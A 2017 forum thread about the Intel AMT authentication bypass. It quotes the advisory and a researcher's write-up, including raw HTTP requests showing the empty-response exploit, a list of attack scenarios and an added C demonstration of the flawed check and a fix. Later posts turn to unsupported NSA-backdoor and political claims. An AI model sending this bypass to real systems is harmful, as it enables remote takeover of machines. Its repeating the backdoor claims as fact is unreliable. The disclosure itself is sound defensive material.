CrAKeN Posted May 2, 2017

Intel patches decade-old bug

Intel has issued a security advisory regarding a critical flaw that has been affecting its processors for almost a decade. The vulnerability resides in the Active Management Technology, Intel Small Business Technology, and Intel Standard Manageability. This is a feature that's mostly used for computers running vPro processors bought by business customers and is used to administer large fleets of computers. Regular users shouldn't be too concerned because the bug doesn't affect chips running on consumer PCs. The situation, however, is critical and has been marked as such.

"There is an escalation of privilege vulnerability in Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM), and Intel® Small Business Technology firmware versions 6.x, 7.x, 8.x, 9.x, 10.x, 11.0, 11.5, and 11.6 that can allow an unprivileged attacker to gain control of the manageability features provided by these products. This vulnerability does not exist on Intel-based consumer PCs," reads the advisory.

According to the company, the vulnerability may be exploited in two ways. The first is through an unprivileged network attacker who could gain system privileges to provisioned Intel manageability SKUs, namely the three aforementioned tools. The second is through an unprivileged local attacker that could provision manageability features, gaining unprivileged network or local system privileges on the three affected tools.

Nasty situation, but not that dire

Ever since the advisory was made public, security experts have been trying to figure out what impact this vulnerability has in the real world. One researcher, for instance, claims that every Intel platform had a remotely exploitable security hole that had gone unfixed for years and that it could likely be exploited over the Internet only when the AMT service was enabled and provisioned inside a network.
Others are equally relaxed about the situation. While the vulnerability is problematic, for an attacker to succeed, the Windows software called Local Manageability Service would have to be running too. In short, only servers running that service with the port reachable are exposed to remote code execution. Using the Shodan computer search engine, just over 6,200 servers had ports 16992 or 16993 open, which is required for a remote attack.
Sylence Posted May 6, 2017

An authentication bypass vulnerability, which will be later known as CVE-2017-5689, was originally discovered in mid-February of 2017 while doing side-research on the internals of Intel ME firmware. The first objects of interest were network services and protocols. While studying the Intel AMT Implementation and Reference Guide we found out that various AMT features are available through the AMT Web-panel, which is supported by the integrated Web server, which listens on ports 16992 and 16993. To protect the AMT from unauthorized access, the Web server provides several methods of authentication and authorization of a remote user. As stated in the Authentication Options section of the «Intel AMT Implementation and Reference Guide»:

"Intel AMT supports both Digest and Kerberos authentication... An exception to this is the admin account, which always uses digest authentication. Continuous use of digest authentication implies that each HTTP request must be sent twice, since the first attempt results in a 401 Digest challenge response."

«An admin account which is present by default and always uses digest authentication» seemed like an interesting thing to dig deeper into.
Reverse-engineering the firmware

Take a look at the example of the negotiation between the AMT Web server and a remote client:

GET /index.htm HTTP/1.1
Host: 192.168.1.2:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:16992/logon.htm
Connection: keep-alive

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="Q0UGAAQEAAAV4M4iGF4+Ni5ZafuMWy9J",stale="false",qop="auth"
Content-Type: text/html
Server: AMT
Content-Length: 678
Connection: close

GET /index.htm HTTP/1.1
Host: 192.168.1.2:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.2:16992/logon.htm
Connection: keep-alive
Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="Q0UGAAQEAAAV4M4iGF4+Ni5ZafuMWy9J", uri="/index.htm", response="d3d4914a43454b159a3fa6f5a91d801d", qop=auth, nc=00000001, cnonce="9c5beca4011eea5c"

HTTP/1.1 200 OK
Date: Thu, 4 May 2017 16:03:49 GMT
Server: AMT
Content-Type: text/html
Transfer-Encoding: chunked
Cache-Control: no cache
Expires: Thu, 26 Oct 1995 00:00:00 GMT

04E6

With the right scripts at hand it didn't take long to load the firmware into the disassembler and pinpoint the authentication code, via xrefs, to quite specific strings, such as «cnonce», «realm», and others. The figure shows a part of the function which is located @ 0x20431E74 in the NETSTACK module of Intel ME firmware version 9.0.30.1482, where the bug was originally discovered.
This function is responsible for analyzing the «Authorization» header from the client's HTTP request and validating the user-provided response to the server challenge. Let's move along the function's code and note, as we proceed, where the parsed values from the Authorization header are stored. Finally, we will come to where the To-Be-Or-Not-To-Be decision takes place, and it looks like this. The part where the call to strncmp() occurs seems most interesting here:

if(strncmp(computed_response, user_response, response_length)) exit(0x99);

The value of the computed response, which is the first argument, is being tested against the one that is provided by the user, which is the second argument, while the third argument is the length of the response. It seems quite obvious that the third argument of strncmp() should be the length of computed_response, but the address of the stack variable response_length, from where the length is to be loaded, actually points to the length of the user_response! Given an empty string, strncmp() evaluates to zero, thus accepting an invalid response as a valid one. No doubt it's just a programmer's mistake, but here it is: keep silence when challenged and you're in.
Exploitation example

With a little help from the local proxy at 127.0.0.1:16992, which is meant to replace the response with an empty string, we're able to manage the AMT via the regular Web browser as if we had known the admin password:

GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"
Content-Type: text/html
Server: AMT
Content-Length: 678
Connection: close

GET /index.htm HTTP/1.1
Host: 127.0.0.1:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Authorization: Digest username="admin", realm="Digest:048A0000000000000000000000000000", nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="", qop=auth, nc=00000001, cnonce="60513ab58858482c"

HTTP/1.1 200 OK
Date: Thu, 4 May 2017 16:09:17 GMT
Server: AMT
Content-Type: text/html
Transfer-Encoding: chunked
Cache-Control: no cache
Expires: Thu, 26 Oct 1995 00:00:00 GMT

04E6

Possible attack scenarios

Now let us talk about what a possible attacker could do after gaining access to the AMT services. First of all, you should remember that Intel AMT provides the ability to remotely control the computer system even if it's powered off (but connected to the electricity mains and network). Also, Intel AMT is completely independent of the OS installed on the computer system. In fact, this technology allows remotely deleting or reinstalling it.
So, there are several possible attack scenarios that could be conducted using the mentioned vulnerability. These are based on the following Intel AMT features:

• KVM (remote control of mouse, keyboard and monitor): you can use this capability to remotely perform any common physical actions (with mouse, keyboard) you do locally and usually when you are working with your PC. Which means you can remotely load and execute any program on the target system, read/write any file (using the common file explorer), etc.

• IDE-R (IDE Redirection): you can remotely change the boot device to some other virtual image, for example (so the system won't boot your usual Operating System from your hard drive, but will boot the image (virtual disk) from the source specified remotely).

• SOL (Serial over LAN): you can remotely power on/power off/reboot/reset and do other actions with this feature. Also, it can be used to access BIOS setup for editing.
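As an added example (not code from the post or from Embedi's write-up), the following C reproduces the comparison logic described above with a corrected check beside it; the header parser, the sample Authorization headers and the use of the capture's response value as the "computed" fixture are constructed stand-ins. It also shows that the flawed check accepts not only an empty response but any prefix of the expected one.

```c
#include <stdio.h>
#include <string.h>

/* Stand-in for the response the firmware computes from the admin password,
 * nonce, cnonce and URI (MD5 in the real Digest scheme). The value is the
 * one from the legitimate capture above, reused here only as a fixture. */
static const char *kComputed = "d3d4914a43454b159a3fa6f5a91d801d";

/* Constructed Authorization headers (not real traffic). */
static const char *kGoodHeader =
    "Digest username=\"admin\", uri=\"/index.htm\", "
    "response=\"d3d4914a43454b159a3fa6f5a91d801d\", qop=auth";
static const char *kEmptyHeader =   /* the bypass: response="" */
    "Digest username=\"admin\", uri=\"/index.htm\", response=\"\", qop=auth";
static const char *kPrefixHeader =  /* only the first 8 hex chars */
    "Digest username=\"admin\", uri=\"/index.htm\", response=\"d3d4914a\", qop=auth";
static const char *kWrongHeader =
    "Digest username=\"admin\", uri=\"/index.htm\", "
    "response=\"00000000000000000000000000000000\", qop=auth";

/* Copy the value of response="..." into out. Returns 0 on success, -1 if
 * the field is missing or too long. A simplified parser, not the firmware's. */
int parse_response_field(const char *authz, char *out, size_t outsz) {
    const char *p = strstr(authz, "response=\"");
    if (!p) return -1;
    p += strlen("response=\"");
    const char *end = strchr(p, '"');
    if (!end || (size_t)(end - p) >= outsz) return -1;
    memcpy(out, p, (size_t)(end - p));
    out[end - p] = '\0';
    return 0;
}

/* Flawed check, mirroring the post: the length passed to strncmp() is that
 * of the *user-supplied* response. With an empty response strncmp(.., 0)
 * returns 0, so the request is accepted; any prefix passes as well. */
int check_vulnerable(const char *computed, const char *user_response) {
    size_t response_length = strlen(user_response);
    return strncmp(computed, user_response, response_length) == 0;
}

/* Corrected check: the supplied response must have exactly the expected
 * length, and every byte is compared without early exit so timing does
 * not reveal how many leading bytes matched. */
int check_fixed(const char *computed, const char *user_response) {
    size_t expected_len = strlen(computed);
    if (strlen(user_response) != expected_len) return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < expected_len; i++)
        diff |= (unsigned char)(computed[i] ^ user_response[i]);
    return diff == 0;
}

/* Run one header through both checks. Returns -1 if the header has no
 * response field, otherwise bit 1 = flawed check result, bit 0 = fixed. */
int evaluate_header(const char *computed, const char *authz) {
    char user_response[128];
    if (parse_response_field(authz, user_response, sizeof user_response) != 0)
        return -1;
    return (check_vulnerable(computed, user_response) << 1) |
            check_fixed(computed, user_response);
}

int main(void) {
    const char *names[] = {"correct", "empty", "prefix", "wrong"};
    const char *headers[] = {kGoodHeader, kEmptyHeader, kPrefixHeader, kWrongHeader};
    for (int i = 0; i < 4; i++) {
        int r = evaluate_header(kComputed, headers[i]);
        printf("%-8s flawed=%d fixed=%d\n", names[i], (r >> 1) & 1, r & 1);
    }
    return 0;
}
```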
Sylence Posted May 6, 2017

Ok, looks like Intel loves the NSA. They put a backdoor in, but now that people found out about that they call it a "bug". Intel users better use a custom BIOS as a temporary workaround, or if their systems support "coreboot" then use it instead, since it's open source as well. Or buy a backup BIOS chip for your main board, then flash a custom BIOS on one of those; some custom BIOSes even let you OC non-K CPUs as well. In case you're wondering what that all means, it means anyone, the NSA in particular, can read your hard drive data; they have formatting tools which can work remotely, they just have to log into your BIOS through your network card. You know when your PC is on power but shut down, your network card is still active? This is a lot worse for those using DMZ or exposed host; that just means you're granting the NSA your WAN access.
steven36 Posted May 6, 2017

"Install Firmware Update to Patch the Vulnerability NOW!

The bug affects Intel manageability firmware versions 6.x, 7.x, 8.x, 9.x, 10.x, 11.0, 11.5, and 11.6 for Intel's AMT, ISM, and SBT platforms. However, versions before 6 or after 11.6 are not impacted. Intel has rated the vulnerability as highly critical and released new firmware versions, instructions to detect if any workstation runs AMT, ISM, or SBT, a detection guide to check if your system is vulnerable, and a mitigation guide for those organizations that cannot immediately install updates. So, Intel customers are strongly recommended to install a firmware patch without wasting a single second. Also, there's a simple mitigation tool available on Github, created by malware researcher Bart Blaze, which is based on the Mitigation Guide provided by Intel. All an affected user has to do is just download and run DisableAMT.exe; it will disable Intel AMT on the Windows operating system (x86 and x64)."

http://thehackernews.com/2017/05/intel-amt-vulnerability.html
Sylence Posted May 6, 2017

https://news.ycombinator.com/item?id=14275884
https://www.ssh.com/vulnerability/intel-amt/
https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf
Batu69 Posted May 6, 2017

Topic has been merged.

"Exploit to pwn systems using vPro and AMT

Code dive: You can remotely commandeer and control computers that use vulnerable Intel chipsets by sending them empty authentication strings. You read that right. When you're expected to send a password hash, you send zero bytes. Nothing. Nada. And you'll be rewarded with powerful low-level access to a vulnerable box's hardware from across the network – or across the internet if the management interface faces the public web. Remember that the next time Intel, a $180bn international semiconductor giant, talks about how important it treats security. To recap: Intel provides a remote management toolkit called AMT for its business and enterprise-friendly processors; this software is part of Chipzilla's vPro suite and runs at the firmware level, below and out of sight of Windows, Linux, or whatever operating system you're using. The code runs on Intel's Management Engine, a tiny secret computer within your computer that has full control of the hardware and talks directly to the network port, allowing a device to be remotely controlled regardless of whatever OS and applications are running, or not, above it."

How to remote hijack computers using Intel's insecure chips: Just use an empty login string
steven36 Posted May 6, 2017

This exploit has been present for 9 years now. If the NSA was using it, by now they have some other backdoor; the NSA hacks on a large scale, and once a bug is patched it's not really viable for them to use known malware, but still it needs patching because now everybody knows about it. As long as there is no open source hardware and people keep using these giant vendors, back doors will always remain, illegal ones, and maybe soon it may become legal. It's not just the NSA who is interested in this. Some countries have already passed laws making this sort of thing legal. In the UK you can get put in jail for exposing backdoors like this; even that is just one example of a country that legalized it.
vibranium Posted May 6, 2017

Wait a week. There's more to come. There are rumblings that the Security Advisory is not telling the whole story.
steven36 Posted May 6, 2017

It's already been known to the public since the beginning of May; computer vendors say the new firmware will arrive sometime in May or June. Most vendors never tell you what really happened, and a lot of times they don't tell when hacking tools get stolen; the Government warns them ahead of time. Whenever some researcher tells a vendor about a bug they may be independent, but the government is known to hire them and they could be being paid. Look how long people were in the dark about the NSA before 2013 and Snowden; people who talked about such things were labeled nutbags. And the USA is no longer under Obama's watch; this is yet again an old bug most likely used when Obama was in there. Trump is trying to kill off everything that Obama did, so things are no longer the same. The era of Obama's war on whistleblowers is over, and Obama even pardoned some of them in the end. But now things are going to be like before Obama was in there. Trump doesn't want the press to know anything, and he's told Government Agencies not to talk to the press, and if you do you risk losing your job; many already have lost their job in just a few months.
Sylence Posted May 6, 2017

Trump wants people to think that he is against what the NSA is doing, but that's a lie.
steven36 Posted May 6, 2017

Trump is the Director of the National Security Agency's boss; they have to answer to him. He's out to change the NSA, I know that much. If they used section 702 to spy on you, would you like it much? It's not just Trump that's questioning the NSA. Now Rand Paul thinks the NSA spied on him too.

Rand Paul Wants to Know if Intelligence Community Spied On Him
http://www.rollcall.com/news/politics/rand-paul-wants-know-intelligence-community-spied

There You Have It: Obama Admin. Spied On Trump, His Staff, Congress, & Trump Supporters
http://washingtonfeed.com/there-you-have-it-obama-admin-spied-on-trump-his-staff-congress-trump-supporters.html
Sylence Posted May 6, 2017

Intel didn't fix everything, just 50%, so that people will shut up about it. The backdoor of course is still there, with the reserved password; they don't even mention it there. People found it out through RE; they just decompiled the BIOS of many mainboards. You think the NSA would let them fix everything? Too naive. They would have to release the PSP so Intel won't be able to hide anything anymore. AMD did that. Their whole firmware is a fucking blob.
Sylence Posted May 6, 2017

3 hours ago, steven36 said:
Trump is the Director of the National Security Agency's boss; they have to answer to him. He's out to change the NSA, I know that much. If they used section 702 to spy on you, would you like it much? It's not just Trump that's questioning the NSA. Now Rand Paul thinks the NSA spied on him too. Rand Paul Wants to Know if Intelligence Community Spied On Him http://www.rollcall.com/news/politics/rand-paul-wants-know-intelligence-community-spied There You Have It: Obama Admin. Spied On Trump, His Staff, Congress, & Trump Supporters http://washingtonfeed.com/there-you-have-it-obama-admin-spied-on-trump-his-staff-congress-trump-supporters.html

wtf? Why are you talking about politic shit here? It's a computer and tech topic.
steven36 Posted May 7, 2017

14 hours ago, saeed_dc said:
wtf? Why are you talking about politic shit here? It's a computer and tech topic.

No, I was not talking about politics. I was talking about some who are involved in politics being spied on by the NSA, which is about privacy and security. I didn't say to vote for them or that I even liked these people. If they spy on them they sure would spy on me or you, is what I'm saying. You were the one who was talking about who liked who; I could care less if he likes the NSA or not, he still is their boss. Only if I worked for the NSA would I care; he doesn't pay my bills. Trump is not only the president, he's also commander in chief of the military, and the NSA is part of it. The NSA was invented by a president a long time ago. Some left-winged people thought Trump was a nutbag when he said he was spied on. But like I told them before, someone must have told him this info and he had his reasons, and come to find out it was a fact he was spied on. It pays to be paranoid nowadays. There is no proof the NSA used this Intel exploit to spy on people yet. They may have, I don't know. But till it's proven it's not facts. Unless someone investigates it no one would really know, and even though they're being investigated for spying on people, if they found out it was so it doesn't mean they would tell us. It could have been used by the NSA or any other Government agency in the whole world, or it could have been being used by blackhats, or maybe it was never used at all till it was found out by the researcher. There are endless theories you could use. Exploits are used all the time and not all malware is written by state actors. Intel didn't say if it was being exploited in the wild or not, did they?

Quote from Gadget_Guy:
Why would they make a backdoor that was this sloppy? Surely they would just hard code a fixed password and then make it look like the system was secure. It seems far more likely to be the result of incompetence than collusion with any three-letter agency.

2013 was a long time ago, and what info Snowden had was already old back in 2013; we have no idea what the NSA does today very much, but them spying on people that were soon to be their boss shows they're still up to their old tricks. Some people believe anything; even once they posted on this site that Snowden was dead and a bunch believed it on here, but I didn't believe it for a minute because dead people can't delete twitter posts!
Sylence Posted May 7, 2017

2 hours ago, steven36 said:
No, I was not talking about politics. I was talking about some who are involved in politics being spied on by the NSA, which is about privacy and security. I didn't say to vote for them or that I even liked these people. If they spy on them they sure would spy on me or you, is what I'm saying. You were the one who was talking about who liked who; I could care less if he likes the NSA or not, he still is their boss. Only if I worked for the NSA would I care; he doesn't pay my bills. Trump is not only the president, he's also commander in chief of the military, and the NSA is part of it. The NSA was invented by a president a long time ago. Some left-winged people thought Trump was a nutbag when he said he was spied on. But like I told them before, someone must have told him this info and he had his reasons, and come to find out it was a fact he was spied on. It pays to be paranoid nowadays. There is no proof the NSA used this Intel exploit to spy on people yet. They may have, I don't know. But till it's proven it's not facts. Unless someone investigates it no one would really know, and even though they're being investigated for spying on people, if they found out it was so it doesn't mean they would tell us. It could have been used by the NSA or any other Government agency in the whole world, or it could have been being used by blackhats, or maybe it was never used at all till it was found out by the researcher. There are endless theories you could use. Exploits are used all the time and not all malware is written by state actors. Intel didn't say if it was being exploited in the wild or not, did they?

Of course they never admit if an exploit in their product was used, and the exploit is still there, and yes, of course they still keep it open for the NSA. I told the reason above. Once the NSA comes to AMD they can't hide malicious code in their BIOS because they made it public.
steven36 Posted May 7, 2017

58 minutes ago, saeed_dc said:
Of course they never admit if an exploit in their product was used, and the exploit is still there, and yes, of course they still keep it open for the NSA. I told the reason above. Once the NSA comes to AMD they can't hide malicious code in their BIOS because they made it public.

Till there is any real proof they even used it, it's just a theory, and it was Intel's fault; blaming it on anyone else is just pointing fingers. This doesn't look like the NSA's work; they take a great deal of care not to be found out. The only time anyone has found out what any 3-letter agency's exploits were was either when someone stole the info or it was talked about in court. It's like the FBI's Tor Exploit: we know it exists because they talked about it in court, but still we don't know how it's done. So sometimes they do admit to it, but just because you know it exists doesn't make you any safer from it unless the code is exposed. And it doesn't matter if the code is open; if you don't know what the exploit is it can't be patched. Most exploits found in open source were as old as this one and there was no proof the NSA ever used them either. The only thing is, if hardware were open source it would make it harder to exploit, but that would not stop it from happening. Also, open source gets patched faster. In Windows AMD still provides old drivers to Microsoft that haven't been updated in years for old hardware; they only pulled them from use in Linux and updated it for old hardware.
Recruit Posted May 7, 2017

I have 3 ThinkPad laptops and all of them are vulnerable... Lenovo said that an update for one of them is expected for 06/05/2017, but nothing until now...
steven36 Posted May 7, 2017

You can use the tool from github and disable it from the BIOS if you don't want to wait.
Recruit Posted May 7, 2017

32 minutes ago, steven36 said:
You can use the tool from github and disable it from the BIOS if you don't want to wait.

Does this tool do more than a simple disable of Intel AMT from the BIOS? Because I did that yesterday.
Sylence Posted May 7, 2017

Lmao
Atasas Posted May 7, 2017

Let me sway a bit from the topic in a sense: has anybody tested any hardware software suites for their update processes? I have, and apart from obvious-oblivious Intel, my old Belkin used to connect to Belkin every day for data checking, and the only way to disable it was giving up the admin suite and limiting connections manually via the Windows connections center... which I "trust"... Nobody is safe!
steven36 Posted May 7, 2017

4 hours ago, Recruit said:
Does this tool do more than a simple disable of Intel AMT from the BIOS? Because I did that yesterday.

What it does is disable the AMT, and it gives you an option to automatically disable the Intel Local Management Service by renaming the file if you want.